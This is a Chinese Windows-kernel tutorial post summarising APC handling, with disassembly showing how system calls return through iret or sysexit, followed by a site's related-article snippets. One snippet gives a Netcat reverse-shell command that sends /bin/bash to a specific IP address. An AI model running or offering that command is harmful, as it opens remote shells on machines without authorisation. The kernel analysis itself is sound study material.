写在前面

  此系列是本人一个字一个字码出来的,包括示例和实验截图。由于系统内核的复杂性,故可能有错误或者不全面的地方,如有错误,欢迎批评指正,本教程将会长期更新。 如有好的建议,欢迎反馈。码字不易,如果本篇文章有帮助你的,如有闲钱,可以打赏支持我的创作。如想转载,请把我的转载信息附在文章后面,并声明我的个人信息和本人博客地址即可,但必须事先通知我

你如果是从中间插过来看的,请仔细阅读 羽夏看Win系统内核——简述 ,方便学习本教程。

  看此教程之前,问几个问题,基础知识储备好了吗?保护模式篇学会了吗?练习做完了吗?没有的话就不要继续了。


华丽的分割线


小结

  本篇章我们从APC是什么?是怎样初始化的,是怎样插入的,是怎样执行的这几个方面学习。总体来说APC基础知识也就这些。下面先强调一些我介绍过但没有指明出来的知识点。

  我提出几个问题,如果你能回答上来,就说明仔细学了或者自己能够挖掘我没明说的东西。

  1. 当处理 APC 的时候,内核 APC 一定会处理吗?用户 APC 一定处理吗?在那个函数点进行处理的?
  2. 挂 APC 的链表有两个,存放于一个具有两个成员链表数组中,请问索引是0的是挂内核 APC 的还是用户 APC 的,索引是1的同理?
  3. 应用层的用户 APC 是怎样到3环执行的?

  我给出如下答案:

  1. 内核 APC 一定会处理,用户 APC 不一定会处理。处理的点是线程交换(只处理内核 APC)和 API调用与中断异常退出函数处(都处理)。
  2. 索引是0的是挂的是内核 APC ,索引是1的是挂的用户 APC。
  3. 通过用 CONTEXT 保存原来的 TrapFrame ,然后修改返回到一个函数处理。

系统调用返回分析

  我们学系统调用的时候有一个坑还没填完,那就是系统API是如何返回的,但是学完APC之后,这就没什么好讲的了,自己继续逆向就差不多了,但是还是逆向的结果还是有坑,下面我就把这个坑给你填上。现在我把如下我的反汇编结果给你:

loc_46663A:                             ; CODE XREF: _KiBBTUnexpectedRange+38↑j
; _KiBBTUnexpectedRange+43↑j
mov ecx, ds:0FFDFF124h
mov edx, [ebp+_KTRAP_FRAME._Edx]
mov [ecx+_KTHREAD.TrapFrame], edx
_KiFastCallEntry endp _KiServiceExit proc near ; CODE XREF: KiCallUserMode(x,x)+E7↑j
; _KiSetLowWaitHighThread+7D↓j ... ; FUNCTION CHUNK AT .text:00466754 SIZE 00000088 BYTES cli
test [ebp+_KTRAP_FRAME.EFlags], 20000h
jnz short IsVM8086_0
test byte ptr [ebp+_KTRAP_FRAME.SegCs], 1
jz short IsRing0 ; 开始还原堆栈存储的环境 IsVM8086_0: ; CODE XREF: _KiServiceExit+8↑j
; _KiServiceExit+63↓j
mov ebx, ds:0FFDFF124h
mov [ebx+_KTHREAD.Alerted], 0
cmp [ebx+_KTHREAD.ApcState.UserApcPending], 0
jz short IsRing0 ; 开始还原堆栈存储的环境
mov ebx, ebp
mov [ebx+_KTHREAD.ApcState.Process], eax
mov dword ptr [ebx+_KTHREAD.IdleSwapBlock], 3Bh ; ';'
mov [ebx+_KTHREAD.ApcState.ApcListHead.Blink], 23h ; '#'
mov [ebx+_KTHREAD.ApcState.ApcListHead.Flink], 23h ; '#'
mov dword ptr [ebx+_KTHREAD.Iopl], 0
mov ecx, 1 ; NewIrql
call ds:__imp_@KfRaiseIrql@4 ; KfRaiseIrql(x)
push eax
sti
push ebx ; trapframe
push 0 ; unknown
push 1 ; CanUserAPC
call _KiDeliverApc@12 ; KiDeliverApc(x,x,x)
pop ecx ; NewIrql
call ds:__imp_@KfLowerIrql@4 ; KfLowerIrql(x)
mov eax, [ebx+_KTHREAD.ApcState.Process]
cli
jmp short IsVM8086_0
; ---------------------------------------------------------------------------
align 10h IsRing0: ; CODE XREF: _KiServiceExit+E↑j
; _KiServiceExit+1E↑j
mov edx, [esp+_KTRAP_FRAME.ExceptionList] ; 开始还原堆栈存储的环境
mov ebx, large fs:_KPCR.DebugActive
mov large fs:_KPCR, edx
mov ecx, [esp+_KTRAP_FRAME.PreviousPreviousMode]
mov esi, large fs:_KPCR.PrcbData.CurrentThread
mov [esi+_KTHREAD.PreviousMode], cl
test ebx, 0FFh
jnz short IsDebugging FillDebugInfoBack: ; CODE XREF: _KiServiceExit+11B↓j
; _KiServiceExit+14A↓j
test [esp+_KTRAP_FRAME.EFlags], 20000h
jnz IsVM8086_Exit
test word ptr [esp+_KTRAP_FRAME.SegCs], 1111111111111000b
jz loc_4667AA
cmp word ptr [esp+_KTRAP_FRAME.SegCs], 1Bh
bt word ptr [esp+_KTRAP_FRAME.SegCs], 0 ; CF = CS & 1
cmc ; CF = !CF
ja IsRing3_Exit
cmp word ptr [ebp+_KTRAP_FRAME.SegCs], 8
jz short IsRing0_0 loc_466711: ; CODE XREF: _KiServiceExit+15C↓j
lea esp, [ebp+_KTRAP_FRAME.SegFs]
pop fs
assume fs:nothing IsRing0_0: ; CODE XREF: _KiServiceExit+C6↑j
lea esp, [ebp+_KTRAP_FRAME._Edi]
pop edi
pop esi
pop ebx
pop ebp
cmp word ptr [esp+8], 80h ; '€' ; cmp tf.cs , 80
ja loc_466FF0 ; 这个地方一定不会跳转
add esp, 4
test dword ptr [esp+4], 1 ; test tf.cs,1,判断是3环还是0环
_KiServiceExit endp ; sp-analysis failed

  好,也就是这里开始有坑,我继续把反汇编结果列上:

_KiSystemCallExitBranch proc near       ; DATA XREF: KiDisableFastSyscallReturn()+9↑w
; KiEnableFastSyscallReturn():loc_425D2C↑r ... ; FUNCTION CHUNK AT .text:0046673C SIZE 00000001 BYTES jnz short _KiSystemCallExit
pop edx
pop ecx
popf
jmp edx
_KiSystemCallExitBranch endp ; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR _KiSystemCallExit2
; ADDITIONAL PARENT FUNCTION _KiSystemCallExitBranch _KiSystemCallExit: ; CODE XREF: _KiSystemCallExitBranch↑j
; _KiSystemCallExit2+5↓j
; DATA XREF: ...
iret
; END OF FUNCTION CHUNK FOR _KiSystemCallExit2 ; =============== S U B R O U T I N E ======================================= _KiSystemCallExit2 proc near ; DATA XREF: KiRestoreFastSyscallReturnState()+16↑o arg_5 = byte ptr 9 ; FUNCTION CHUNK AT .text:0046673C SIZE 00000001 BYTES test byte ptr [esp+9], 1
jnz short _KiSystemCallExit
pop edx
add esp, 4
and byte ptr [esp+1], 0FDh
popf
pop ecx
sti
sysexit
iret
_KiSystemCallExit2 endp ; sp-analysis failed

  通过test判断是否是3环,如果是的话跳走用iret返回,看似没啥问题。但是如果我是快速调用进入的,这就有问题了,因为有对应的sysexit退出的。我们用WinDbg得出如下结果:

  是不是很奇怪?发现实际是通过KiSystemCallExit2退出的。这就是静态分析和动态分析的不同之处。

  sysexit的为我们做哪些事情呢?我给说明一下:

  1. 将 IA32_SYSENTER_CS + 0x10 装载到 cs 寄存器,将 edx 寄存器中的指令的指针装载到 eip ;
  2. 将IA32_SYSENTER_CS + 0x18 装载到 ss 寄存器中;
  3. 将 ecx 寄存器中的指针装载到 esp 中,切换到3环权限;

  到此系统调用怎么进0环,做了那些事情,怎么出0环,就结束了。

下一篇

  羽夏看Win系统内核——句柄表篇

APC 篇——总结与提升的更多相关文章

  1. 羽夏看Win系统内核—— APC 篇

    写在前面   此系列是本人一个字一个字码出来的,包括示例和实验截图.由于系统内核的复杂性,故可能有错误或者不全面的地方,如有错误,欢迎批评指正,本教程将会长期更新. 如有好的建议,欢迎反馈.码字不易, ...

  2. APC 篇—— APC 执行

    写在前面   此系列是本人一个字一个字码出来的,包括示例和实验截图.由于系统内核的复杂性,故可能有错误或者不全面的地方,如有错误,欢迎批评指正,本教程将会长期更新. 如有好的建议,欢迎反馈.码字不易, ...

  3. APC 篇——初识 APC

    写在前面   此系列是本人一个字一个字码出来的,包括示例和实验截图.由于系统内核的复杂性,故可能有错误或者不全面的地方,如有错误,欢迎批评指正,本教程将会长期更新. 如有好的建议,欢迎反馈.码字不易, ...

  4. APC 篇——备用 APC 队列

    写在前面   此系列是本人一个字一个字码出来的,包括示例和实验截图.由于系统内核的复杂性,故可能有错误或者不全面的地方,如有错误,欢迎批评指正,本教程将会长期更新. 如有好的建议,欢迎反馈.码字不易, ...

  5. APC 篇—— APC 挂入

    写在前面   此系列是本人一个字一个字码出来的,包括示例和实验截图.由于系统内核的复杂性,故可能有错误或者不全面的地方,如有错误,欢迎批评指正,本教程将会长期更新. 如有好的建议,欢迎反馈.码字不易, ...

  6. 【Spark机器学习速成宝典】模型篇07梯度提升树【Gradient-Boosted Trees】(Python版)

    目录 梯度提升树原理 梯度提升树代码(Spark Python) 梯度提升树原理 待续... 返回目录 梯度提升树代码(Spark Python) 代码里数据:https://pan.baidu.co ...

  7. 1. 不吹不擂,第一篇就能提升你对Bean Validation数据校验的认知

    乔丹是我听过的篮球之神,科比是我亲眼见过的篮球之神.本文已被 https://www.yourbatman.cn 收录,里面一并有Spring技术栈.MyBatis.JVM.中间件等小而美的专栏供以免 ...

  8. 高并发高负载系统架构-php篇

    首先呢,我罗列一下文章的目录,让大家有个整体轮廓的了解! 1.为什么要进行高并发和高负载的研究 2.高并发和高负载的约束条件 3.解决之道——硬件篇 4.解决之道——部署篇 5.解决之道——环境篇 6 ...

  9. 羽夏看Win系统内核——进程线程篇

    写在前面   此系列是本人一个字一个字码出来的,包括示例和实验截图.由于系统内核的复杂性,故可能有错误或者不全面的地方,如有错误,欢迎批评指正,本教程将会长期更新. 如有好的建议,欢迎反馈.码字不易, ...

随机推荐

  1. hdu 4549 M斐波那契数列(快速幂 矩阵快速幂 费马小定理)

    题目链接http://acm.hdu.edu.cn/showproblem.php?pid=4549: 题目是中文的很容易理解吧.可一开始我把题目看错了,这毛病哈哈. 一开始我看错题时,就用了一个快速 ...

  2. 1142 - Summing up Powers (II)

    1142 - Summing up Powers (II)    PDF (English) Statistics Forum Time Limit: 2 second(s) Memory Limit ...

  3. Netcat反弹shell的方法

    VPS监听: aliyun:  nc -lvnp 7777 监听7777端口 被监听: nc -w 10 -e /bin/bash 8.130.49.121 7777  (-w:连接超时时间 -e 使 ...

  4. toString()、String.valueOf、(String)强转

    1.基本类型 (1)基本类型没有toString()方法 (2)推荐使用String.valueOf(); (3)无法强转 =========补========= (String)是标准的类型转换,将 ...

  5. 【计组】《计算机组成与体系结构性能设计》William Stallings 第2部分 计算机系统 第3章 计算机功能和互连的顶层视图

    关键词 address bus 地址总线 asynchronous timing 异步时序 bus 总线 bus arbitration 总线仲裁 bus width 总线宽度 centralized ...

  6. CS5213高性价比替代AG6200芯片|兼容台湾AG6200芯片|CS5213Capstone

    CS5213是一款HDMI转VGA带音频信号转出的芯片方案,CS5213支持HDCP协议,且外围电路比台湾安格AG6200要少,且本身CS5213芯片成本比AG6200要低,整个方案设计简单性价比较高 ...

  7. unittest+ddt_实现数据驱动测试(7)

    我们设计测试用例时,会出现测试步骤一样,只是其中的测试数据有变化的情况,比如测试登录时的账号密码.这个时候,如果我们依然使用一条case一个方法的话,会出现大量的代码冗余,而且效率也会大大降低.此时, ...

  8. Centos7安装maxscale 实现mysql的读写分离

    安装依赖 yum install -y novacom-server.x86_64 libaio.x86_64 libaio-devel.x86_64 网站下载 https://downloads.m ...

  9. 一次性删除 .svn 文件夹

    方法一 (Windows 7; Python 3.5.2) import os for (p,d,f) in os.walk(r"G:\qycache\test"): if p.f ...

  10. java 封装 总结

    1.前言 老是被问什么是java 封装...很基础的一个问题 ,其实我们一直在写的东西但不知道怎么称呼. 比如 在entity实体类 里面老用到的 getter 和 setter 方法其实就是封装的方 ...